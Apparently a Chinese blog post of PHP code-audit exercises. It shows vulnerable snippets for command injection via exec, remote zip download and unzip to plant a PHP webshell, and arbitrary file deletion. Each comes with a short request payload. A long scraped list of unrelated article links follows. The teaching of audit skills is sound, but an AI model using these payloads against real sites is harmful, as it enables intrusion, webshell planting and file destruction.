昵称还在想呢
昵称还在想呢

PHP代码审计之实战审代码篇2

4. 仔细观察如下代码,思考代码有什么缺陷,可能由此引发什么样的问题?
logged_in) {
    echo 'Don\'t bother trying to hack me!!!!!
 This hack attempt has been logged';
    $log->Warn("Security Issue: Some tried to access this file directly from IP: " . $_SERVER['REMOTE_ADDR'] . " & Username: " . $session->username . " (File: " . $_SERVER['PHP_SELF'] . ")");
    // need to add authentication to this script
    header("Location: " . $config_basedir . "login.php");
} else {
//archive logs files
    $mainPath = $_GET['path'];
    $archiveMainPath = $mainPath . "archive/";
    $ext = "*." . $_GET['ext'];
    $fullpath = $mainPath . $ext;
// create and archive dir if not already created
    if (!is_dir($archiveMainPath)) {
        mkdir("$archiveMainPath");
    }
    $today = date("Ymd");
    $commandString = "sudo -u apache zip -r -j " . $archiveMainPath . "filename" . $today . ".zip " . $mainPath . $ext;
    $ext 是拼接上去的 是可控传参 没有经过任何过滤
    exec($commandString);
    foreach (glob($fullpath) as $v) {
        unlink($v);
    }

    $fileCount = count(glob($mainPath . $ext));

    if ($fileCount > 0) {
        $response = json_encode(array(
            'failure' => true
        ));
    } else {
        $response = json_encode(array(
            'success' => true
        ));
    }
    echo $response;
}  // end session check

拼接造成命令注入了!
相关payload参考

GET /lib/ajaxHandlers/ajaxArchiveFiles.php?path=1&ext=;ls%3E../../pq.txt HTTP/1.1

5.仔细观察如下代码,思考代码有什么缺陷,可能由此引发什么样的问题?

/A/c/PluginsController.php

PHP代码审计之实战审代码篇2_第1张图片

PHP 的 fopen() 函数可以用来打开远程文件

其中这个类可用用action参数去调用不同函数,例如以下

PHP代码审计之实战审代码篇2_第2张图片

PHP代码审计之实战审代码篇2_第3张图片

 解题:
        那我们可以发两个包,一个用来调用start-download 函数来下载一个远程的zip文件。当然这个地址是我们可控的,
action=start-download&filepath=msgphone&download_url=http://0.0.0.0/test/a.zip
        第二个包就调用file-upzip函数,让它去解压含php马的zip文件,也正好解压到了网站下的A/exts ,我们去访问它
action=sfile-upzip&filepath=msgphone&download_url=

PHP代码审计之实战审代码篇2_第4张图片

 6.仔细观察如下代码,思考代码有什么缺陷,可能由此引发什么样的问题?
public function delall(){
        if(isset($_POST['send'])){
            if(validate::isNullString($_POST['pid'])) tool::layer_alert('没有选择任何图片!','?a=pic',7);
            $_fileDir=ROOT_PATH.'/uploads/';
            foreach($_POST['pid'] as $_value){
                $_filePath=$_fileDir.$_value;
                if(!unlink($_filePath)){
                    tool::layer_alert('图片删除失败,请设权限为777!','?a=pic',7);
                }else{
                    header('Location:?a=pic');
                }
            }

        }

    }

pid是我们可控的,而且之后是拼接到filepath的 那这不就造成任意文件删除了吗!
解题
PHP代码审计之实战审代码篇2_第5张图片

你可能感兴趣的:(PHP代码审计,php,开发语言)

  • Apache Doris中都用了哪些开发语言,编译过程中用到了哪些编译器,以及用到了哪些成熟的技术框架 fzip Dorisapache开发语言
    ApacheDoris作为一款高性能的实时分析型数据库,其技术栈涉及多语言开发、多种编译器支持以及多个成熟技术框架的集成。以下是综合多个来源的详细分析:一、开发语言Java•应用场景:主要用于开发Frontend(FE),负责元数据管理、查询解析、集群管理等模块。•关键模块:◦FE的元数据持久化通过BDBJE(BerkeleyDBJavaEdition)实现。◦MySQL协议兼容和HTTP服务分别
  • PHP的模板引擎一共包含哪些部分?使用场景是什么?底层原理是什么? 快点好好学习吧 PHPphpjava开发语言
    一、PHP模板引擎的组成部分1.核心定义模板引擎:模板引擎是一种工具,用于将动态数据嵌入到静态HTML模板中,生成最终的HTML输出。主要组件:模板文件:包含HTML和占位符(如{{variable}})的文件。解析器:将模板文件中的占位符替换为实际数据。渲染器:将解析后的模板内容输出为最终的HTML。缓存机制:缓存编译后的模板以提高性能。二、使用场景1.常见使用场景Web开发:动态生成网页内容(
  • Synology 部署的 WordPress 無法升級至最新版本時,可以透過以下改良版指南進行排查和解決。 蠟筆小新工程師 synologywordpress
    當Synology部署的WordPress無法升級至最新版本時,可以透過以下改良版指南進行排查和解決。我對內容進行了補充和重新組織,希望能幫助你更高效地處理這類問題:權限相關問題處理檢查文件和目錄權限:確保WordPress安裝目錄內的目錄權限設置為755,文件權限設置為664。特殊文件wp-config.php權限應設置為600,以加強安全性。可以使用以下命令在終端中修改:bashchmod-R
  • 计算机毕业设计springboot晋中学院失物招领系统的设计与实现unst3源码+系统+程序+lw文档+部署 呦呦网络 springbootjavamysql
    计算机毕业设计springboot晋中学院失物招领系统的设计与实现unst3源码+系统+程序+lw文档+部署计算机毕业设计springboot晋中学院失物招领系统的设计与实现unst3源码+系统+程序+lw文档+部署本源码技术栈:项目架构:B/S架构开发语言:Java语言开发软件:ideaeclipse前端技术:Layui、HTML、CSS、JS、JQuery等技术后端技术:JAVA运行环境:Wi
  • 计算机毕业设计JAVA人职匹配推荐系统mybatis+源码+调试部署+系统+数据库+lw 诺诺网络 javamybatis开发语言
    计算机毕业设计JAVA人职匹配推荐系统mybatis+源码+调试部署+系统+数据库+lw计算机毕业设计JAVA人职匹配推荐系统mybatis+源码+调试部署+系统+数据库+lw本源码技术栈:项目架构:B/S架构开发语言:Java语言开发软件:ideaeclipse前端技术:Layui、HTML、CSS、JS、JQuery等技术后端技术:JAVA运行环境:Win10、JDK1.8数据库:MySQL5
  • 利用神经网络来解决鸢尾花分类任务(附实验结果和代码) 侠之大者231 深度学习实战机器学习深度学习人工智能分类神经网络
    前言本篇文章使用自己亲手搭建的神经网络模型来解决鸢尾花数据集的分类任务,读者们可以通过该简单的任务进一步理解神经网络,并且可以自己动手去搭建神经网络。鸢尾花数据集的介绍https://archive.ics.uci.edu/ml/index.php大家可以通过这个网站下载鸢尾花数据集,里面有各种经典数据集供大家使用。附:本来想给大家具体讲一讲的,但发现网站里面讲的已经很详细了,大家想用的自己去了解
  • xXSS 墨菲斯托888 xss前端
    XSS漏洞:XSS又叫CSS(CrossSiteScript)跨站脚本攻击是一种针对网站应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时会受到影响。恶意用户利用xss代码攻击成功后,可能得到很高的权限:私密网页内容,会话和Cookiexss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xs
  • 基于PHP的轻醇咖啡小店管理系统设计与实现 Olivia-gogogo PHPphp开发语言
    第一章引言1.1研究背景与意义互联网的飞速发展在逐渐改变着我们的生活。计算机网络技术日新月异的进步和互联网的日益普及,使人类生活发生了巨大的变化。互联网为那些有信息需求的人提供方便快捷的服务。随着我国经济的迅速发展,人们的生活水平有了显著提高,对精神方面的需求也越来越高,商城业变得越来越受人们的欢迎。商城业的发展也带动了当地经济的发展,作为商城业来说,宣传自己的商城商品是非常重要的,而互联网的发展
  • 阿里云 LAMP环境配置(centos7.6+apache+mysql5.7+php7.3.4) 坚持到底就能逆袭 linuxlinuxapachecentos服务器运维
    在安装配置环境的时候遇到了些问题,网上的基本没有一篇就能跟着做完的,所以自己也整理了一下,从开始安装到完成查询的一些资料,如果这篇文章能帮到你,我真的很高兴!!查看系统信息cat/etc/redhat-releaseuname-a安装apache参考这篇:用yum快速搭建LAMP平台安装mysql5.7先参考这篇卸载原来的mariadb:阿里云(Linux)Centos7上安装Mysql5.7步骤
  • 基于SpringBoot农产品智慧物流系统的设计与实现 四金学长 计算机毕业设计参考案例springboot后端java农产品智慧物流系统
    1.引言在当今的软件开发领域,企业级应用的开发和部署速度直接影响着业务的竞争力。SpringBoot以其轻量级、快速启动和强大的集成能力,成为构建现代企业级应用的首选框架。本文将带您深入了解SpringBoot框架的核心特性,并展示如何利用它构建一个高效、可扩展的系统。2.开发环境开发语言:Java框架:springbootJD版本:JDK1.8服务器:tomcat7数据库:mysql5.7(一定
  • 安装 apk 和 obb 文件(qbit) apk
    前言apk和obb文件可以打包到一起成为xapk文件xapk文件可以用google商店的XAPKInstaller安装xapk文件也可以用APKPure安装案例以Englishgrammarinuse的安装为例下载地址:https://seatracker.ru/viewtopic.php?t=49675下载后有2个文件English_Grammar_in_Use_v1.11.40.apkorg.
  • centos 安装composer 教程 automan02 centoscomposerlinux
    打开命令行php-r"copy('https://getcomposer.org/installer','composer-setup.php');"sudophpcomposer-setup.php--install-dir=/usr/local/bin--filename=composercomposer--versionsudochmodu+s/usr/local/bin/composerS
  • 【开源项目】2024最新PHP在线客服系统源码/带预知消息/带搭建教程 于飞SEO 免费资源分享开源php开发语言
    简介随着人工智能技术的飞速发展,AI驱动的在线客服系统已经成为企业提升客户服务质量和效率的重要工具。本文将探讨AI在线客服系统的理论基础,并展示如何使用PHP语言实现一个简单的AI客服系统。源码仓库地址:ym.fzapp.top在线客服系统的理论基础AI在线客服系统通过自然语言处理(NLP)、机器学习(ML)和深度学习(DL)技术,能够理解和响应客户的查询。这些系统通常包括以下几个关键组件:自然语
  • 外卖O2O平台系统源码校园跑腿点餐商城拼单同城配送帮买帮送php 「已注销」 python
    【标题】外卖O2O平台系统源码校园跑腿点餐商城拼单同城配送帮买帮送php【正文】随着移动互联网的快速发展,外卖O2O平台成为了现代人生活中不可或缺的一部分。在这个快节奏的社会中,人们愈发需要便捷、高效的食品配送服务。为了满足校园和社区用户的需求,本文将介绍一个基于PHP语言开发的外卖O2O平台系统源码,该系统涵盖了校园跑腿、点餐商城、拼单和同城配送等功能,为用户提供全方位的服务体验。首先,校园跑腿
  • 新建login.php页面实现登录功能,PHP实现的登录页面信息提示功能示例 粗细愁倚阑
    本文实例讲述了PHP实现的登录页面信息提示功能。分享给大家供大家参考,具体如下:login.php:Inserttitlehere帐号:密码:echo"";//通过error值,确定提示信息if(!empty($_GET['error'])){$error=$_GET['error'];If($error==1){Echo"您输入的账号或密码错误!";}elseif($error==2){Echo
  • 如何在PHP中实现表单处理? 破碎的天堂鸟 PHP学习php开发语言
    在PHP中实现表单处理涉及多个关键步骤,包括表单创建、数据接收、验证、处理及存储。以下是详细实现指南,结合了最佳实践和安全措施:一、表单处理基本流程PHP表单处理的核心流程包括以下步骤:创建HTML表单:定义输入字段和提交方式。提交数据:通过POST或GET方法发送数据。接收数据:使用超全局变量$_POST或$_GET获取数据。验证数据:检查数据的合法性、完整性和安全性。处理数据:存储到数据库、发
  • MySQL 教程(超详细,零基础可学、第一篇) web13765607643 面试学习路线阿里巴巴mysqladb数据库
    目录一、MySQL数据库概述二、MySQL连接1、使用MySQL二进制方式连接2、使用PHP脚本连接MySQL三、MySQL创建数据库1、使用mysqladmin创建数据库2、使用PHP脚本创建数据库四、MySQL删除数据库1、使用mysqladmin删除数据库2、使用PHP脚本删除数据库五、MySQL选择数据库1、从命令提示窗口中选择MySQL数据库2、使用PHP脚本选择MySQL数据库六、My
  • MySQL性能监控与调优工具详解 杨胜增 数据库mysql性能优化
    MySQL性能监控与调优工具详解亲爱的亦菲彦祖,欢迎来到第十三篇关于MySQL的博客!在前几篇文章中,我们深入探讨了MySQL的基础知识、数据库设计、性能优化、索引、事务管理、安全管理、数据备份与恢复、与PHP的集成、高可用性架构设计、存储过程和触发器的应用以及数据可视化。今天,我们将重点介绍MySQL性能监控与调优工具,帮助你实时监控数据库性能,识别瓶颈,并进行有效的优化,确保你的数据库系统高效
  • sql注入基础原理(SQL injection) ????27282 优秀文章秀秀sql数据库服务器pythonjava
    sql注入基础原理文章目录sql注入基础原理Sql注入简介案例表产生sql注入的写法python相关java相关php相关sql注入相关技术B:基于布尔的盲注特征案例总结E:基于错误案例总结U:基于联合查询案例总结S:堆叠查询案例T:基于时间的盲注案例总结稀奇古怪的字典mysql基础->https://blog.csdn.net/qq_52549196/article/details/122530
  • 闪客网盘同款的运营级网盘系统网站源码 timesky php
    闪客网盘同款的运营级网盘系统网站源码,一款非常实用的网盘系统,支持转存和限速下载,VIP开启高速下载!源码无任何后门木马亲测,放心使用可以帮助您打造一个安全可靠的网盘分享平台,该系统支持用户使用微信扫码关注公众号登录,上传文件分享链接可自定义,文件可一键保存到我的网盘,支付易支付和官方支付接口!搭建说明Nginx1.20PHP7.1-7.3MySOL5.6phpMyAdmin5.11.上传源码到根
  • Laya2.x游戏引擎入门系列(二):UI界面开发 安也 i 游戏
    前端开发和游戏开发相信选择laya游戏引擎这类h5游戏引擎的开发者或多或少都有一些前端的开发经验,在开始开发小游戏之后会努力寻找和过往开发经历相似的地方。最后会发现二者之间的关系类似于网页开发和node.js服务端开发之间的关系,虽然都是使用了前端的开发语言(JS或TS),但是背后涉及的知识点却完全不同。小游戏全部是通过canvas或者webgl画在页面中,而网页开发是通过浏览器去做的渲染。我们在
  • ASP.NET MVC 网站优化总结 使用 Gzip 压缩 飞鸟flyboy 服务器安全常用技巧
    1.开GZIP有什么好处?答:Gzip开启以后会将输出到用户浏览器的数据进行压缩的处理,这样就会减小通过网络传输的数据量,提高浏览的速度。2.如何启用IIS的Gzip压缩功能:答:首先,如果你需要压缩静态文件(HTML),需要在硬盘上建一个目录,并给它“IUSR_机器名”这个用户的写权限。如果压缩动态文件(PHP,asp,aspx)就不需要了,因为它的页面是每次都动态生成的,压缩完就放弃。然后在I
  • 后端开发如何提高项目系统的性能 云计算课代表 日常运维问题合集运维服务器centoslinux
    引言提高后端PHP开发系统的性能可以从多个维度进行,例如通过代码优化、缓存优化、数据库优化、异步处理和消息队列、服务器优化、内容分发网络(CDN)的应用以及系统安全性的强化。本文主要介绍如何通过以上方法对系统进行优化,提高项目的性能。代码优化主要涉及代码重构、算法优化、代码维护和更新。代码重构主要是指在原有代码的基础上,对代码的结构和逻辑进行简化,以提高代码的可读性、可维护性和执行效率。在这个过程
  • linux下搭建radius服务器,linux搭建freeradius服务器 weixin_39692761
    相关网站系统版本:CentOSLinuxrelease7.3.1611(Core)我的系统上面什么都没有安装,这里要下载一些需要的包,这里说明下,我使用yum安装phpRPM包的时候会自动安装apache服务,所以这里我就不安装apache了,如果你们的phpRPM包中没有Apache就用yuminstall-yhttpd安装下。yuminstall-yphpphp-gdwgetgccgcc-c+
  • MySQL与Oracle对比及区别 web18285482512 面试学习路线阿里巴巴mysqloracle数据库
    一、比较1、MySQL的特点性能卓越,服务稳定,很少出现异常宕机;开放源代码无版本制约,自主性及使用成本低;历史悠久,社区和用户非常活跃,遇到问题及时寻求帮助;软件体积小,安装使用简单且易于维护,维护成本低;品牌口碑效应;支持多种OS,提供多种API接口,支持多种开发语言,对流行的PHP,Java很好的支持2、Oracle的特点兼容性:Oracle产品采用标准SQL,并经过美国u构架标准技术所(N
  • centos7编译安装php7.4 T暴风雪 PHPLinuxlinux服务器centos
    1.安装依赖包yuminstalllibxml2libxml2-developensslopenssl-develbzip2bzip2-devellibcurllibcurl-devellibjpeglibjpeg-devellibpnglibpng-develfreetypefreetype-develgmpgmp-devellibmcryptlibmcrypt-develreadlinerea
  • CI查看当前页面执行的所有sql语句 T暴风雪 CIPHPCI所有sql语句
    CI框架中有一个查看最后一条sql执行的方法/system/database/DB_driver.php文件的1085行左右publicfunctionlast_query(){returnend($this->queries);}有时需要查看一个页面中执行的所有sql语句,这在优化时很有帮助。减少sql查询次数,也是优化的一个方面,其实只要把返回语句的end()去掉就行了!在DB_driver.
  • [原创](Modern C++)现代C++的关键性概念: 非常独特的std::sentinel_for概念(哨兵概念) 我不是代码教父 #C/C++探究c++sentinel开发语言
    [作者]常用网名:猪头三出生日期:1981.XX.XX企鹅交流:643439947个人网站:80x86汇编小站编程生涯:2001年~至今[共24年]职业生涯:22年开发语言:C/C++、80x86ASM、ObjectPascal、Objective-C、C#、R、Python、PHP、Perl、开发工具:VisualStudio、Delphi、XCode、C++Builder、Eclipse技能种
  • Node.js调用DeepSeek Api 实现本地智能聊天的简单应用 egekm_sefg 面试学习路线阿里巴巴node.js
    在人工智能快速发展的今天,如何快速构建一个智能对话应用成为了开发者们普遍关注的话题。本文将为大家介绍一个基于Node.js的命令行聊天应用,它通过调用硅基流动(SiliconFlow)的API接口,实现了与DeepSeek模型的智能对话功能。这个项目不仅实现了流式响应输出,还提供了对话记录的自动保存功能,是一个非常实用的AI对话工具。代码下载:https://gitee.com/phpervip/
  • php获取网页301,302后的真实地址,支持多重跳转
    functiongetrealurl($url){$realurl=$url;try{$headers=get_headers($realurl,true);if(isset($headers['Location'])){if(is_array($headers['Location'])){$location='';for($i=count($headers['Location']);$i>0;$
  • 多线程编程之存钱与取钱 周凡杨 javathread多线程存钱取钱
      生活费问题是这样的:学生每月都需要生活费,家长一次预存一段时间的生活费,家长和学生使用统一的一个帐号,在学生每次取帐号中一部分钱,直到帐号中没钱时 通知家长存钱,而家长看到帐户还有钱则不存钱,直到帐户没钱时才存钱。   问题分析:首先问题中有三个实体,学生、家长、银行账户,所以设计程序时就要设计三个类。其中银行账户只有一个,学生和家长操作的是同一个银行账户,学生的行为是
  • java中数组与List相互转换的方法 征客丶 JavaScriptjavajsonp
    1.List转换成为数组。(这里的List是实体是ArrayList)   调用ArrayList的toArray方法。   toArray   public T[] toArray(T[] a)返回一个按照正确的顺序包含此列表中所有元素的数组;返回数组的运行时类型就是指定数组的运行时类型。如果列表能放入指定的数组,则返回放入此列表元素的数组。否则,将根据指定数组的运行时类型和此列表的大小分
  • Shell 流程控制 daizj 流程控制if elsewhilecaseshell
    Shell 流程控制 和Java、PHP等语言不一样,sh的流程控制不可为空,如(以下为PHP流程控制写法): <?php if(isset($_GET["q"])){ search(q);}else{// 不做任何事情} 在sh/bash里可不能这么写,如果else分支没有语句执行,就不要写这个else,就像这样 if else if if 语句语
  • Linux服务器新手操作之二 周凡杨 Linux 简单 操作
    1.利用关键字搜寻Man Pages    man -k keyword  其中-k 是选项,keyword是要搜寻的关键字 如果现在想使用whoami命令,但是只记住了前3个字符who,就可以使用 man -k who来搜寻关键字who的man命令       [haself@HA5-DZ26 ~]$ man -k
  • socket聊天室之服务器搭建 朱辉辉33 socket
    因为我们做的是聊天室,所以会有多个客户端,每个客户端我们用一个线程去实现,通过搭建一个服务器来实现从每个客户端来读取信息和发送信息。    我们先写客户端的线程。 public class ChatSocket extends Thread{ Socket socket; public ChatSocket(Socket socket){ this.sock
  • 利用finereport建设保险公司决策分析系统的思路和方法 老A不折腾 finereport金融保险分析系统报表系统项目开发
    决策分析系统呈现的是数据页面,也就是俗称的报表,报表与报表间、数据与数据间都按照一定的逻辑设定,是业务人员查看、分析数据的平台,更是辅助领导们运营决策的平台。底层数据决定上层分析,所以建设决策分析系统一般包括数据层处理(数据仓库建设)。   项目背景介绍 通常,保险公司信息化程度很高,基本上都有业务处理系统(像集团业务处理系统、老业务处理系统、个人代理人系统等)、数据服务系统(通过
  • 始终要页面在ifream的最顶层 林鹤霄
    index.jsp中有ifream,但是session消失后要让login.jsp始终显示到ifream的最顶层。。。始终没搞定,后来反复琢磨之后,得到了解决办法,在这儿给大家分享下。。 index.jsp--->主要是加了颜色的那一句 <html> <iframe name="top" ></iframe> <ifram
  • MySQL binlog恢复数据 aigo mysql
    1,先确保my.ini已经配置了binlog:   # binlog log_bin = D:/mysql-5.6.21-winx64/log/binlog/mysql-bin.log log_bin_index = D:/mysql-5.6.21-winx64/log/binlog/mysql-bin.index log_error = D:/mysql-5.6.21-win
  • OCX打成CBA包并实现自动安装与自动升级 alxw4616 ocxcab
    近来手上有个项目,需要使用ocx控件 (ocx是什么? http://baike.baidu.com/view/393671.htm) 在生产过程中我遇到了如下问题. 1. 如何让 ocx 自动安装?     a) 如何签名?     b) 如何打包?     c) 如何安装到指定目录? 2.
  • Hashmap队列和PriorityQueue队列的应用 百合不是茶 Hashmap队列PriorityQueue队列
      HashMap队列已经是学过了的,但是最近在用的时候不是很熟悉,刚刚重新看以一次,   HashMap是K,v键 ,值     put()添加元素      //下面试HashMap去掉重复的 package com.hashMapandPriorityQueue; import java.util.H
  • JDK1.5 returnvalue实例 bijian1013 javathreadjava多线程returnvalue
    Callable接口: 返回结果并且可能抛出异常的任务。实现者定义了一个不带任何参数的叫做 call 的方法。 Callable 接口类似于 Runnable,两者都是为那些其实例可能被另一个线程执行的类设计的。但是 Runnable 不会返回结果,并且无法抛出经过检查的异常。        ExecutorService接口方
  • angularjs指令中动态编译的方法(适用于有异步请求的情况) 内嵌指令无效 bijian1013 JavaScriptAngularJS
            在directive的link中有一个$http请求,当请求完成后根据返回的值动态做element.append('......');这个操作,能显示没问题,可问题是我动态组的HTML里面有ng-click,发现显示出来的内容根本不执行ng-click绑定的方法!     
  • 【Java范型二】Java范型详解之extend限定范型参数的类型 bit1129 extend
    在第一篇中,定义范型类时,使用如下的方式:   public class Generics<M, S, N> { //M,S,N是范型参数 }  这种方式定义的范型类有两个基本的问题:   1. 范型参数定义的实例字段,如private M m = null;由于M的类型在运行时才能确定,那么我们在类的方法中,无法使用m,这跟定义pri
  • 【HBase十三】HBase知识点总结 bit1129 hbase
    1. 数据从MemStore flush到磁盘的触发条件有哪些?    a.显式调用flush,比如flush 'mytable'    b.MemStore中的数据容量超过flush的指定容量,hbase.hregion.memstore.flush.size,默认值是64M 2. Region的构成是怎么样? 1个Region由若干个Store组成
  • 服务器被DDOS攻击防御的SHELL脚本 ronin47
    mkdir /root/bin vi /root/bin/dropip.sh #!/bin/bash/bin/netstat -na|grep ESTABLISHED|awk ‘{print $5}’|awk -F:‘{print $1}’|sort|uniq -c|sort -rn|head -10|grep -v -E ’192.168|127.0′|awk ‘{if($2!=null&a
  • java程序员生存手册-craps 游戏-一个简单的游戏 bylijinnan java
    import java.util.Random; public class CrapsGame { /** * *一个简单的赌*博游戏,游戏规则如下: *玩家掷两个骰子,点数为1到6,如果第一次点数和为7或11,则玩家胜, *如果点数和为2、3或12,则玩家输, *如果和为其它点数,则记录第一次的点数和,然后继续掷骰,直至点数和等于第一次掷出的点
  • TOMCAT启动提示NB: JAVA_HOME should point to a JDK not a JRE解决 开窍的石头 JAVA_HOME
    当tomcat是解压的时候,用eclipse启动正常,点击startup.bat的时候启动报错; 报错如下:   The JAVA_HOME environment variable is not defined correctly This environment variable is needed to run this program NB: JAVA_HOME shou
  • [操作系统内核]操作系统与互联网 comsci 操作系统
         我首先申明:我这里所说的问题并不是针对哪个厂商的,仅仅是描述我对操作系统技术的一些看法       操作系统是一种与硬件层关系非常密切的系统软件,按理说,这种系统软件应该是由设计CPU和硬件板卡的厂商开发的,和软件公司没有直接的关系,也就是说,操作系统应该由做硬件的厂商来设计和开发
  • 富文本框ckeditor_4.4.7 文本框的简单使用 支持IE11 cuityang 富文本框
    <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>知识库内容编辑</tit
  • Property null not found darrenzhu datagridFlexAdvancedpropery null
    When you got error message like "Property null not found ***", try to fix it by the following way: 1)if you are using AdvancedDatagrid, make sure you only update the data in the data prov
  • MySQl数据库字符串替换函数使用 dcj3sjt126com mysql函数替换
    需求:需要将数据表中一个字段的值里面的所有的  .   替换成  _   原来的数据是  site.title  site.keywords  .... 替换后要为     site_title  site_keywords   使用的SQL语句如下:   updat
  • mac上终端起动MySQL的方法 dcj3sjt126com mysqlmac
    首先去官网下载: http://www.mysql.com/downloads/ 我下载了5.6.11的dmg然后安装,安装完成之后..如果要用终端去玩SQL.那么一开始要输入很长的:/usr/local/mysql/bin/mysql 这不方便啊,好想像windows下的cmd里面一样输入mysql -uroot -p1这样...上网查了下..可以实现滴. 打开终端,输入: 1
  • Gson使用一(Gson) eksliang jsongson
    转载请出自出处:http://eksliang.iteye.com/blog/2175401 一.概述 从结构上看Json,所有的数据(data)最终都可以分解成三种类型: 第一种类型是标量(scalar),也就是一个单独的字符串(string)或数字(numbers),比如"ickes"这个字符串。 第二种类型是序列(sequence),又叫做数组(array)
  • android点滴4 gundumw100 android
    Android 47个小知识 http://www.open-open.com/lib/view/open1422676091314.html Android实用代码七段(一) http://www.cnblogs.com/over140/archive/2012/09/26/2611999.html http://www.cnblogs.com/over140/arch
  • JavaWeb之JSP基本语法 ihuning javaweb
      目录   JSP模版元素  JSP表达式  JSP脚本片断  EL表达式  JSP注释  特殊字符序列的转义处理  如何查找JSP页面中的错误   JSP模版元素    JSP页面中的静态HTML内容称之为JSP模版元素,在静态的HTML内容之中可以嵌套JSP
  • App Extension编程指南(iOS8/OS X v10.10)中文版 啸笑天 ext
             当iOS 8.0和OS X v10.10发布后,一个全新的概念出现在我们眼前,那就是应用扩展。顾名思义,应用扩展允许开发者扩展应用的自定义功能和内容,能够让用户在使用其他app时使用该项功能。你可以开发一个应用扩展来执行某些特定的任务,用户使用该扩展后就可以在多个上下文环境中执行该任务。比如说,你提供了一个能让用户把内容分
  • SQLServer实现无限级树结构 macroli oraclesqlSQL Server
    表结构如下: 数据库id path titlesort 排序 1 0 首页 0 2 0,1 新闻 1 3 0,2 JAVA 2 4 0,3 JSP 3 5 0,2,3 业界动态 2 6 0,2,3 国内新闻 1 创建一个存储过程来实现,如果要在页面上使用可以设置一个返回变量将至传过去   create procedure test as begin decla
  • Css居中div,Css居中img,Css居中文本,Css垂直居中div qiaolevip 众观千象学习永无止境每天进步一点点css
    /**********Css居中Div**********/ div.center { width: 100px; margin: 0 auto; } /**********Css居中img**********/ img.center { display: block; margin-left: auto; margin-right: auto; }
  • Oracle 常用操作(实用) 吃猫的鱼 oracle
    SQL>select text from all_source where owner=user and name=upper('&plsql_name');  SQL>select * from user_ind_columns where index_name=upper('&index_name');  将表记录恢复到指定时间段以前
  • iOS中使用RSA对数据进行加密解密 witcheryne iosrsaiPhoneobjective c
      RSA算法是一种非对称加密算法,常被用于加密数据传输.如果配合上数字摘要算法, 也可以用于文件签名. 本文将讨论如何在iOS中使用RSA传输加密数据. 本文环境 mac os  openssl-1.0.1j, openssl需要使用1.x版本, 推荐使用[homebrew](http://brew.sh/)安装. Java 8 RSA基本原理 RS
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他